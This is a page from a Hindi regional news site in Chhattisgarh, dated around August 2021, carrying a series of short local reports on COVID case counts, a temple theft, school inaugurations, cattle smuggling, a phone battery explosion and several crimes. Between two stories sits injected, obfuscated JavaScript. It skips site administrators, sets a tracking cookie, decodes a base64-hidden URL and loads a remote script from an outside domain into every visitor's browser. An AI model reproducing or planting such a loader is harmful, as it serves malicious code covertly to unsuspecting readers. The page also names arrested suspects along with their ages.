छत्तीसगढ़ में टीकाकृत लोगों पर कोरोना का असर कम हो रहा है। वहीं संक्रमित में संक्रमण का स्तर बेहद कम है। यानी गंभीर स्थिति तक मरीज नहीं पहुंच रहे हैं। स्वास्थ्य विभाग से मिली जानकारी के मुताबिक राजधानी में पिछले 10 दिनों में 118 कोरोना संक्रमित मरीज सामने आए हैं। इसमें से 50 लोग ऐसे थे, जिन्हें टीका लगा था। इसी वजह से इनमें कोरोना अधिक प्रभावी नहीं रहा। ऐसे मरीजों को गंभीर स्थिति में अस्पताल तक पहुंचने की नौबत भी नहीं आई है। इधर बिलासपुर, जांजगीर-चांपा, अंबिकापुर, दुर्ग, रायगढ़ समेत अन्य जिलों में वैक्सीन लगवाने वाले कितने व्यक्ति संक्रमित हुए, इसकी जानकारी ही नहीं जुटाई जा सकी है। स्वास्थ्य अधिकारियों ने बताया कि कोरोना वैक्सीन लगवाने वाले जो व्यक्ति संक्रमित हो रहे हैं। उनमें संक्रमण का स्तर बेहद कम अा रहा है। वैक्सीन लगवाने के बाद भी मास्क, सैनिटाइजेशन जैसे बचाव के नियमों का पालन करने के लिए कहा जा रहा क्योंकि सीधे तौर पर संक्रमण के प्रभाव से बचा जा सके और चेन ना बन पाए।
गोलबाजार क्षेत्र स्थित बंजारी मंदिर के दान पेटी से नगदी रकम चोरी करने वाले 05 आरोपी गिरफ्तार
राजधानी रायपुर मैं इंसानियत को शर्मसार कर देने वाली वारदात सामने आई है। जहां हम भगवान से अपनी मनोकामना को पूरी करने के लिए क्या कुछ नहीं करते,वही ऐसे भी चोर है। जो सब कुछ देने वाले भगवान के घर में चोरी कर अपना पाप का घड़ा भर रहे हैं ।
पुलिस ने बंजारी मंदिर के दान पेटी से नगदी रकम चोरी करने वाले 5 आरोपी को गिरफ्तार किया है. पुलिस के मुताबिक प्रार्थी राजय वर्मा ने थाना गोलबाजार में रिपोर्ट दर्ज कराया कि वह बंजारी चैक गोलबाजार में रहता है तथा पेशे से वकील है। बंजारी चौक गोलबाजार में बंजारी माता का काफी प्राचीन मंदिर है, मंदिर के अंदर एक दान पेटी रखीं है, जो जंजीर से बंधी रहती है जिसमें ताला लगा रहता है। मंदिर में दर्शनार्थी भक्तगण तथा व्यवसायी पूजा पाठ करने आते है और अपनी श्रद्धा अनुसार चढ़ावा दान पेटी में डालते है। मंदिर का दरवाजा प्रतिदिन सुबह करीब 07.00 बजे खुलता है, दोपहर 01.00 बजे बंद हो जाता है, फिर शाम 04.00 बजे खुलता है जो रात्रि करीब 08.00 बजे आरती होने के बाद रात करीब 09.00 बजे बंद हो जाता है। दिनांक 29.07.2021 के सुबह करीब 07.00 बजे प्रार्थी मंदिर खुलने के समय में आया तो वहां पर मंदिर के दक्षिण तरफ खुलने वाले दरवाजे के पास मंदिर के पुजारी सहित अन्य व्यक्ति देखें की बंजारी मंदिर के दरवाजे के उस गेट का ताला टूटा हुआ नीचे पडा था। दान पेटी टूटी हुई मंदिर के बाहर पीछे तरफ किनारे में पढ़ी हुई थी, कुछ चिल्लहर तथा 10 के नोट थे। कोई अज्ञात चोर मंदिर के दरवाजे मंे लगे ताला को तोडकर अंदर प्रवेश कर दान पेटी जो कि मंदिर के अंदर जंजीर में लाॅक कर रखी थी, को तोड कर दान पेटी में रखंे नगदी रकम को चोरी कर ले गया है। जिस पर अज्ञात आरोपी के विरूद्ध थाना गोलबाजार में अपराध क्रमांक 60/21 धारा 457, 380 भादवि. का अपराध पंजीबद्ध किया गया।

घटना को पुलिस उपमहानिरीक्षक एवं वरिष्ठ पुलिस महोदय श्री अजय यादव द्वारा गंभीरता से लेते हुये अतिरिक्त पुलिस अधीक्षक शहर श्री लखन पटले, नगर पुलिस अधीक्षक कोतवाली श्री आंजनेय वाश्णेय (भा.पु.से.) एवं श्री के.के.वाजपेयी थाना प्रभारी गोलबाजार को अज्ञात आरोपी की पतासाजी कर गिरफ्तार करने हेतु आवश्यक दिशा निर्देश दिये गये। जिस पर वरिष्ठ अधिकारियों के निर्देशन में थाना गोलबाजार पुलिस की टीम द्वारा अज्ञात आरोपी की पतासाजी प्रारंभ की गई। टीम के सदस्यों द्वारा घटना के संबंध में प्रार्थी, मंदिर के पुजारी सहित आसपास के लोगों से विस्तृत पूछताछ किया गया।
प्रकरण में मुखबीर लगाने के साथ ही घटना स्थल व उसके आसपास लगे सी.सी.टी.व्ही. कैमरों के फुटेजों को खंगालकर अज्ञात आरोपी की पहचान सुनिश्चित करने के प्रयास किये जा रहे थे। इसी दौरान घटना में संलिप्त नज्जू उर्फ अब्दुल अजीम जो कि पूर्व में भी चोरी के प्रकरणों में जेल निरूद्ध रह चुका था के संबंध में महत्वपूर्ण जानकारी प्राप्त हुई जिसके आधार पर टीम द्वारा नज्जू उर्फ अब्दुल अजीम को पकड़कर प्राप्त साक्ष्यों के आधार पर कड़ाई से पूछताछ करने पर आरोपी नज्जू द्वारा अपने अन्य साथी प्रकाश चन्द्राकर, अतीक खान, राजेश साहू एवं अजय विश्वकर्मा के साथ मिलकर मंदिर में रखें दान पेटी से नगदी रकम चोरी करना स्वीकार किया गया। जिस पर टीम के सदस्यों द्वारा घटना में संलिप्त सभी आरोपियों को गिरफ्तार कर आरोपियों की निशानदेही पर उनके कब्जे से चोरी की नगदी 58,155/- रूपये जप्त कर आरोपियों के विरूद्ध अग्रिम कार्यवाही किया गया। *गिरफ्तार आरोपी*
01. नज्जू उर्फ अब्दुल अजीम पिता अब्दुल हकीम उम्र 19 साल निवासी नूरानी चैक राजातालाब थाना सिविल लाईन रायपुर।
02. प्रकाश चन्द्राकर पिता बोला चन्द्राकर उम्र 19 साल निवासी मोवा तालाब के पास थाना पंडरी रायपुर।
03. अतीक खान पिता शकील खान उम्र 21 साल निवासी दरगाह के पास मोवा थाना पंडरी रायपुर।
04. राजेश साहू पिता श्रीराम साहू उम्र 28 साल निवासी सुंदरीपारा मोवा थाना पंडरी रायपुर।
05. अजय विश्वकर्मा पिता दुखित विश्वकर्मा उम्र 20 साल निवासी विधानसभा रोड़ मोवा थाना पंडरी रायपुर। *आरोपियों को गिरफ्तार करने एवं मशरूका बरामद करने में निरीक्षक के.के.वाजपेयी थाना प्रभारी गोलबाजार, सउनि. गौतम, आर. नरेन्द्र वर्मा, जसवंत शर्मा एवं अमित कुमार की सराहनीय भूमिंका रहीं।*
मुख्यमंत्री भूपेश बघेल ने पाटन क्षेत्र के अंग्रेजी माध्यम स्कूलों में 7.25 करोड़ की लागत वाले कार्यों का किया भूमिपूजन व लोकार्पण।
रायपुर: मुख्यमंत्री भूपेश बघेल ने आज यहां अपने निवास कार्यालय में आयोजित वर्चुअल कार्यक्रम के माध्यम से दुर्ग जिले के पाटन विधानसभा क्षेत्र में संचालित 7 स्वामी आत्मानंद अंग्रेजी माध्यम स्कूलों में अधोसंरचना विस्तार के तहत स्वीकृत 7 करोड़ 25 लाख 66 हजार रूपए की लागत वाले कार्यों का भूमिपूजन और लोकार्पण किया।
मुख्यमंत्री बघेल ने इस मौके पर दुर्ग जिले के सभी सोलह स्वामी आत्मानंद अंग्रेजी स्कूलों में 2 अगस्त से अध्ययन-अध्यापन के लिए कक्षाएं शुरू होने पर बच्चों को बधाई और शुभकामनाएं देते हुए कहा कि कोरोना के कारण बच्चों की पढ़ाई-लिखाई में भी बहुत बाधा आई। कोरोना काल के दौरान बच्चों ने धैर्य के साथ ऑनलाइन अपनी पढ़ाई जारी रखी।
मुख्यमंत्री ने कोरोना काल में पढ़ाई-लिखाई को लेकर स्कूली बच्चों के धैर्य, समझदारी व सहनशीलता की भी प्रशंसा की।
मुख्यमंत्री ने आगे कहा कि हमारी सावधानी के कारण ही कोरोना संक्रमण की रोकथाम में जीत मिली है। कोरोना संकट अभी खत्म नहीं हुआ है, आगे भी बहुत सावधानी बरतने की जरूरत है।
उन्होंने पाटन क्षेत्र में 7 स्वामी आत्मानंद अंग्रेजी स्कूलों में नवप्रवेशित बच्चों को बधाई और शुभकामनाएं देते हुए कहा कि इस क्षेत्र में बीते वर्ष तीन अंग्रेजी माध्यम स्कूल शुरू किए गए थे। इस सत्र से चार नए और अंग्रेजी स्कूल प्रारंभ किए जा रहे। इससे बच्चों को अंग्रेजी माध्यम में शिक्षा अध्ययन की बेहतर सुविधा मिलेगी। उन्होंने कहा कि पूरे राज्य में 172 अंग्रेजी स्कूल शुरू किए जा रहे हैं।
इन स्कूलों में अच्छी से अच्छी शिक्षा के साथ बच्चों को बेहतर सुविधाएं दी जा रही है। स्वामी आत्मानंद अंग्रेजी स्कूल की गुणवत्ता को देखते हुए इन स्कूलों में निजी स्कूलों के बच्चे भी पढऩा चाहते हैं। दुर्ग जिले में 7 हजार 878 बच्चों ने स्वामी आत्मानंद अंग्रेजी स्कूलों में प्रवेश लिया है। स्वामी आत्मानंद अंग्रेजी स्कूल का मुख्य उद्देश्य गरीब से गरीब परिवार के बच्चों को भी अच्छी शिक्षा का अवसर उपलब्ध कराना है। हमारा लक्ष्य छात्रों के सम्पूर्ण व्यक्तित्व का निर्माण करना है। यही बच्चे भविष्य के नवा छत्तीसगढ़ के नागरिक बनेंगे और अपने राज्य को नई ऊंचाईयों पर ले जाएंगे।
इस अवसर पर मुख्यमंत्री ने पाटन क्षेत्र के सभी 7 अंग्रेजी माध्यम स्कूलों के बच्चों से चर्चा की। पाटन के स्वामी आत्मानंद अंग्रेजी स्कूल के छात्र निशांत ने मुख्यमंत्री भूपेश बघेल का आभार जताते हुए कहा कि आपके प्रयासों से हम जैसे बच्चों को अंग्रेजी माध्यम में शिक्षा हासिल करने का स्वर्णिम अवसर शुलभ हुआ है। निशांत ने कहा कि पढ़-लिखकर उसकी इच्छा स्कैच आर्टिस्ट बनने की है।
सेलूद की छात्र शाईनी ने कहा कि आपने अंग्रेजी माध्यम स्कूल शुरू कर के उन बच्चों के लिए भी बेहतरीन शिक्षा की व्यवस्था सुनिश्चित कर दी है, जो आर्थिक अभाव के चलते निजी अंग्रेजी स्कूलों में शिक्षा अध्ययन के लिए सक्षम नहीं थे। जामगांव आर के छात्र रामांशु साहू ने कहा कि अंग्रेजी माध्यम में शिक्षा-अध्ययन का अवसर हम सबके लिए एक बड़ी उपलब्धि है। छात्रा आरोही वर्मा ने कहा कि वह डॉक्टर बनना चाहती है।
अंग्रेजी स्कूल में दाखिला होने से आगे की पढ़ाई की राह आसान हो गई है। पाटन स्कूल के पालक समिति के धर्मेन्द्र सिन्हा ने मुख्यमंत्री को पाटन क्षेत्र के पालकों, शाला प्रबंधन समिति, पालक समिति की ओर से मुख्यमंत्री का धन्यवाद ज्ञापित किया और शिक्षा के क्षेत्र में उनके द्वारा किए गए नवप्रयोग की सराहना की और कहा कि राज्य को इसका फायदा मिलेगा।
खादी ग्रामोद्योग बोर्ड के सदस्य हेमन्त देवांगन, शिक्षिका चंद्रिका उदय, पालक कमलेश मिश्रा ने भी राज्य में अंग्रेजी माध्यम की नि:शुल्क शिक्षा व्यवस्था के भागीरथ प्रयास के लिए मुख्यमंत्री भूपेश बघेल का आभार जताया।
कलेक्टर डॉ. सर्वेश्वर नरेन्द्र भुरे ने कार्यक्रम के प्रारंभ में प्रतिवेदन प्रस्तुत करते हुए अंग्रेजी माध्यम स्कूलों की व्यवस्था की जानकारी दी। उन्होंने कहा कि पाटन क्षेत्र के 7 अंग्रेजी स्कूलों में 2880 सीटों में से अब तक 2809 सीटों पर बच्चों का दाखिला हो चुका है। इन स्कूलों में 157 शिक्षिकों की नियुक्ति की गई है।
इन स्कूलों में कुम्हारी, जंजगिरी, पाटन, सेलूद, रानीतरई, जामगांव एम एवं जामगांव आर शामिल हैं। इस अवसर पर सर्व आशिष वर्मा, नगर पंचायत अध्यक्ष भुपेन्द्र कश्यप एवं अन्य जनप्रतिनिधि सहित पालकगण एवं स्कूली बच्चे उपस्थित थे।
मवेशियों को हकलते हुए ले जा रहे थे उड़ीसा। पुलिस ने किया गिरफ्तार….
महासमुंद: राष्ट्रीय राजमार्ग- 53 ग्राम बरबसपुर बसना के पास पुलिस ने 5 लोगों को गिरफ्तार किया है उनके पास से 75 नग मवेशी जब्त किया है। पकड़े गए आरोपी इन मवेशियों को छग से हकालते व क्रुरतापूर्वक ओडिश ले जा रहे थे। पुलिस ने आरोपियों के खिलाफ पशुक्रुरता अधिनियम के तहत कार्रवाई की है।
पकड़े गए सभी आरोपी बसना क्षेत्र के रहने वाले हैं। थाना से मिली जानकारी के अनुसार मवेशियों को क्रुरतापूर्वक ओडिशा ले जा रहे पठियापाली बसना निवासी निर्मल प्रधान पिता गंगाधर प्रधान (65), वासुदेव यादव पिता वमल यादव (30) , करन लाल पिता नेमीचंद डड़सेना (39), गणेश राम साव पिता महेश (32) एवं रामानंद उर्फ मुन्ना पिता बेनुराम जगत (50) को गिरफ्तार किया है।
ये लोग मवेशियों को बोहारपार से ओडिशा लेकर जा रहे थे। पूछताछ के दौरान आरोपियों ने किसी प्रकार का कागजात पुलिस के पास पेश नहीं किया। इनके पास से 42 गाय, 04 बछिया, 21 बैल, 08 बछडा बरामद किया गया है। सभी को मवेशियों को सुरक्षित सिंघनुपर गोठान में रखा गया है।
बताया जा रहा है कि उक्त महलपारा सरायपाली निवासी मयंक शर्मा पिता नरेश कुमार शर्मा (24) 30 जुलाई रात 9 बजे अपने साथियों के साथ बसना आ रहा था, उसी समय ग्राम बरबसपुर में कृषक पशुओं को पांच लोग मारते, पीटते तथा हकालते हुए सरायपाली की ओर ले ओडिशा लेकर जा रहे थे।
पूछताछ के दौरान बताया कि बोहारपार के हरिशंकर के यहां से मवेशियों को लेकर ओडिशा जा रहे थे। इनके पास वैध कागजात नहीं थे। इसी जानकारी बसना को दी है।
छत्तीसगढ़ प्रदेश में फिट मंडराने लगा कोरोनावायरस का खौफ?
रायपुर: छत्तीसगढ़ में कोरोना संक्रमण का खतरा एक बार फिर बढ़ गया है। रविवार को प्रदेश में 214 लोगों में संक्रमण की पुष्टि हुई। इनमें से आधे से अधिक मरीज दुर्ग, रायपुर और बिलासपुर जिलों में ही मिले हैं। शनिवार को प्रदेश में नए मरीजों की संख्या केवल 102 थी।
एक दिन के अंतराल पर यह अंतर से दोगुने से अधिक हो चुका है। संक्रमण के इन आंकड़ों ने प्रशासन की चिंता बढ़ा दी है। अधिकारियों ने कहा, अगर संक्रमण के यह आंकड़े एक-दो दिन स्थित रह गए तो गंभीर खतरे की बात हो सकती है।
स्वास्थ्य विभाग की ओर से देर रात जारी आंकड़ों के मुताबिक रविवार को कोरोना के 22,412 नमूनों की जांच हुई। इस बीच 214 लोगों में संक्रमण की पुष्टी हुई है। दुर्ग जिले में सबसे अधिक 70 मरीज मिले हैं। रायपुर में 39, बिलासपुर में 19, जांजगीर-चांपा में 12, रायगढ़ में 9 और कांकेर के 8 लोग कोरोना पॉजिटिव मिले हैं।
रविवार को आए आंकड़े पिछले एक सप्ताह के दौरान एक दिन में मरीजों की सर्वाधिक संख्या है। इससे पहले 22 जुलाई को 217 नए मरीज मिले थे। इसके बाद संक्रमण दर बढक़र 0.9 प्रतिशत हो गई है। शनिवार को यह 0.2 प्रतिशत तक घट गई थी।
कोरोना की दूसरी लहर में भी दुर्ग जिला हॉट स्पॉट बना हुआ था। अब एक बार फिर जिले में तेजी से संक्रमण बढऩे लगा है। हालांकि स्वास्थ्य विभाग का दावा है कि यह 4 दिन की पेंडिंग रिपोर्ट के कारण हुआ है। इसमें 29, 30 व 31 जुलाई और 1 अगस्त की रिपोर्ट शामिल है।
इसलिए आंकड़ा अधिक दिख रहा है। जिले में अभी एक्टिव केस बढक़र 148 हो गए हैं। वहीं तीन दिन से वैक्सीनेशन भी बंद है। इसके कारण चिंता और भी बढ़ गई है।
रायपुर के इन क्षेत्रों में मिले कोरोना मरीज
खम्हारडीह, संतोषी नगर, कटोरा तालाब, शिवानंद नगर सेक्टर-2, अग्रोहा कॉलोनी, धरमपुरा, आईआईआईटी, नवा रायपुर परिसर, सीआरपीएफ पुलिस लाइन, सीएएफ माना, जागृति नगर, काठाडीह, काली नगर पंडरी, नयापारा, श्याम प्लाजा के पीछे, मोवा, टाटीबंध, शंकर नगर, देवेंद्र नगर, टैगोर नगर, अवंति विहार, ओल्ड राजेंद्र नगर, ब्रह्मपुरी, सुंदरनगर, बिरगांव, कचना, आमासिवनी, तेलीबांधा और ऐश्वर्या किंगडम कचना।
साइकिल चलाते वक्त फटी OnePlus Nord 2 की बैटरी…
OnePlus Nord 2 पिछले महीने यानी 22 जुलाई को लॉन्च हुआ था. इस फोन को लेकर काफी चर्चा है. इसे साल का सबसे बेस्ट फोन भी बताया जा रहा है. लेकिन एक खबर ने लोगों को हैरान कर दिया है. एक महिला स्लिंग बैग में नया आईप्लस नॉर्ड 2 रखकर साइकिल चला रही थी. तभी फोन से जोर का धमाका हुआ और मालिक को सदमें में डाल दिया. लड़की के पति ने ट्वीट करते हुए लोगों को जानकारी दी थी. बेंगलुरु के अंकुर शर्मा ने ट्वीट किया और कुछ देर बाद डिलीट कर दिया.
तस्वीरें हुईं वायरल
अंकुल शर्मा ने ट्वीट डिलीट कर दिया, लेकिन LetsGoDigital तस्वीर सेव करने में कामयाब रहा. ट्वीट के अनुसार, उनकी पत्नी को इस घटना के कारण एक दुर्घटना का सामना करना पड़ा, जिससे वह सदमें में हैं. सुबह-सुबह उनकी पत्नी पांच दिन पुराना वनप्लस नॉर्ड 2 लेकर साइकलिंग करने गई थीं. तभी मोबाइल फट गया. फोन में से धुआं निकलने लगा. ट्वीट में शेयर की गई तस्वीरों को देखकर साफ है कि नॉर्ड 2 की बैटरी उस समय फट गई जब वह साइकिल चला रही थीं.

कंपनी ने किया रिप्लाई
OnePlus Nord 2 को लेकर यह पहला मामला सामने आया है. अंकुर के ट्वीट के बाद कंपनी ने मामले की जांच शुरू कर दी है. ट्विटर पर वनप्लस सपोर्ट अकाउंट ने लिखा, ‘हम आपके अनुभव के बारे में सुनकर दुखी हैं. हम चिंतित हैं और आप तक पहुंचना चाहते हैं. हम आपसे सीधे संदेश पर हमसे जुड़ने का अनुरोध करते हैं. ताकि हम सुधार कर सकें और इसे आपके लिए बदल सकें’

पहले भी हो चुके हैं ऐसे मामले
अंकुर के ट्वीट को हटाने के बाद, हम यह मान सकते हैं कि दोनों पक्षों में इस मामले पर आपसी सहमति बन गई है. हालांकि, समझौते की सटीक शर्तें अभी स्पष्ट नहीं हैं. यह पहली बार नहीं है जब हमने फोन की बैटरी के फटने या आग लगने की बात सुनी है. पहले, हमने ऐसे कई मामलों के बारे में सुना है, जिनमें कुछ iPhone शामिल हैं. इन घटनाओं में सबसे प्रसिद्ध, निश्चित रूप से, सैमसंग गैलेक्सी नोट 7 का मामला है, एक फोन जिसे लगभग हर जगह आग का खतरा कहा जाता था और बाद में सैमसंग द्वारा इसे बंद कर दिया गया
दंतेवाड़ा: नक्सलियों के नाम पर हॉस्टल में रहने वाले छात्रों ने कर दिया ऐसा कांड कि हर कोई है दंग, जानिए पूरा मामला…
दंतेवाड़ा।

यहां हॉस्टल में रहकर पढ़ाई करने वाले स्कूली छात्रों ने नक्सलियों के नाम पर 2 गावों में जाकर 6 घरों को लूट लिया। खुद को नक्सली दिखाने के लिए नाबालिगों ने NCC की ड्रेस का इस्तेमाल किया। इस मामले में 4 आरोपियों को हिरासत में लिया गया है। इसमें 3 नाबालिग हैं। मामले का मास्टरमाइंड चंदू कर्मा फरार बताया जा रहा है। पुलिस ने लूटे गए रुपयों और सामान के साथ NCC की वर्दी जब्त कर ली है।
बचेली थाना क्षेत्र के दुगेली और पडापुर गांव में नक्सली बनकर लूट की वारदात को अंजाम देने वाले आरोपियों को पुलिस ने गिरफ्तार कर लिया है। जिसमें एक बालिग और 3 नाबालिग बच्चे हैं। एक मुख्य आरोपी फरार है। बचेली हॉस्टल में रहकर स्कूल में पढ़ने वाले 5 बच्चों ने नक्सली बनकर घटना करने का प्लान बनाया जिसके लिए NCC ड्रेस हॉस्टल से लिया। दो मोटरसाइकिल में पहले पडापुर गांव गए जहां 4 ग्रामीणों के घर में घुसकर अपने आपको नक्सली बताकर मारपीट करते हुए चाकू की नोक पर रुपए लूट लिए। वहां से दुगेली गांव गए जहां 2 घरों में लूट की। 5 आरोपियों में चार ने NCC ड्रेस पहनी थी।
रात होने के कारण ग्रामीण वर्दी देखकर नक्सली समझे और जान जाने के डर से रुपए दे दिए। जब ग्रामीणों को शक हुआ तो थाने में रिपोर्ट दर्ज कराई। पुलिस ने 5 आरोपी में से 4 को गिरफ्तार कर लिया है। वहीं इस घटना का मास्टर माइंड फरार है। आरोपियों में से एक ने खुलासा किया कि जो मुख्य आरोपी नंदू कर्मा है उसने बोला है कि गोंगपाल में पुलिस ने हमारी काली वर्दी ओर नकली AK47 पकड़ ली है। पुलिस फरार आरोपी की तलाश कर रही है उसकी गिरफ्तारी के बाद बहुत से राज खुलेंगे। आपको बता दें कि इस लूट की घटना करने वाला मास्टर माइंड नंदू कर्मा कांग्रेस पार्टी के टिकनपाल जनपद सदस्य जोगा कर्मा का बेटा है।
(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();पानी से तैरती मिली लाश,क्षेत्र में फैली सनसनी पुलिस जुटी जांच में
बिलासपुर । जिला कोर्ट के सीनियर रीडर की पानी मे तैरती लाश मिली है। पता चला है की रीडर शुक्रवार को अपने घर से कोर्ट के लिए निकला था,
लेकिन वो फिर वापस घर नहीं पहुंचा। जिसके बाद परिजनों ने उसकी गुमशुदगी की रिपोर्ट सरकंडा थाना में लिखाई थी।

परिजनों को उसकी मौत का पता तब चल सका जब शनिवार सुबह उसकी लाश कोटा स्थित घोंघा जलाशय में तैरता हुई मिली। फिलहाल पुलिस मामले की जांच कर रही है। मृतक की पहचान शिव कुमार श्रीवास्तव के रूप में की गई है।
पिछले डेढ़ वर्ष से 145 हितग्राहियों को नहीं मिला मिली आवास की किस्त पीएम आवास योजना के मकान बनना नारायणपुर जिले में हुआ बंद…
नारायणपुर: जिले में महत्वाकांक्षी प्रधानमंत्री आवास योजना की हालात इतनी पस्त हो चुकी है कि बीते वर्ष सन 2020-21 में 285 मकान निर्माण के लक्ष्य में से लगभग डेढ़ वर्ष से एक भी मकान की नींव की खुदाई तक नहीं हो सकी। योजना के वर्ष 2019-20 के 145 हितग्राही पिछले डेढ़ वर्ष से आवास की किस्त का इंतजार कर रहे है।
जिसे कोरोना संक्रमण काल को वजह बताकर हितग्राहियों को अब तक टाला जा रहा है, यह और कितने दिनों तक टलेगा कुछ कहा नहीं जा सकता है।
प्राप्त जानकारी अनुसार वर्ष 2019-20 में 400 स्वीकृत आवास योजना में से सिर्फ 145 हितग्राहियों को ही केवल तीन किस्त राशि का ही भुगतान हो पाया, इस अवधि के हितग्राही बताते हैं, साल भर पहले उन्हें तीसरी किस्त मिली थी, उस समय उनका आवास छच्चा तक पहुंच गया था।
छत की ढलाई के लिए अगली किस्त का इंतजार कर रहा है, पंचायत तथा जनपद के अधिकारी-कर्मचारियों ने उससे कहा कि जैसे-तैसे छत की ढलाई कर लो, छत की ढ़लाई के बाद अगली किस्त जारी कर देंगे, लेकिन राशि जारी नहीं हुई।
प्रधानमंत्री आवास योजना के जिला समन्वयक गिरेन्द्र साहू ने बताया कि ग्रामीण क्षेत्रों में आवास के लिए एक लाख तीस हजार रुपए शासन द्वारा दिया जाता है, इसके अलावा 95 दिन की मनरेगा मजदूरी करीब 17 हजार रुपए हितग्राहियों को मिलती है। उन्होंने बताया कि इस वर्ष पूरे जिले में 285 मकान का लक्ष्य है। लेकिन अभी तक राज्य से आबंटन नहीं आने की वजह से 2020-21 का पहली किस्त किसी भी हितग्राही को जारी नहीं हो पायी हैं।
पति ने दी जान से मारने की धमकी पत्नी ने किया महिला आयोग में मामला दर्ज…
खुलासा छत्तीसगढ़,रायपुर: पत्नी द्वारा महिला आयोग में शिकायत करने पर पति ने गाली-गलौच कर दी जान से मारने की धमकी। मामले की रिपोर्ट सिविललाईन थाने में दर्ज करायी गई है।
मिली जानकारी के अनुसार थाना सरायपाली महासमुंद निवासी प्रियंका नंद 33 वर्ष पति विजय नंद ने थाने में शिकायत दर्ज करायी है कि पीडि़ता अपने पति के खिलाफ महिला आयोग में शिकायत दर्ज करायी है इस मामले में 31 जुलाई को शाम 5 बजे महिला आयोग परिसर में पेशी पर गई थी तभी उसके पति ने गाली-गलौचकर जान से मारने की धमकी दिया। मामले की शिकायत पर पुलिस ने आरोपी के खिलाफ अपराध कायम कर मामला दर्ज कर लिया है।









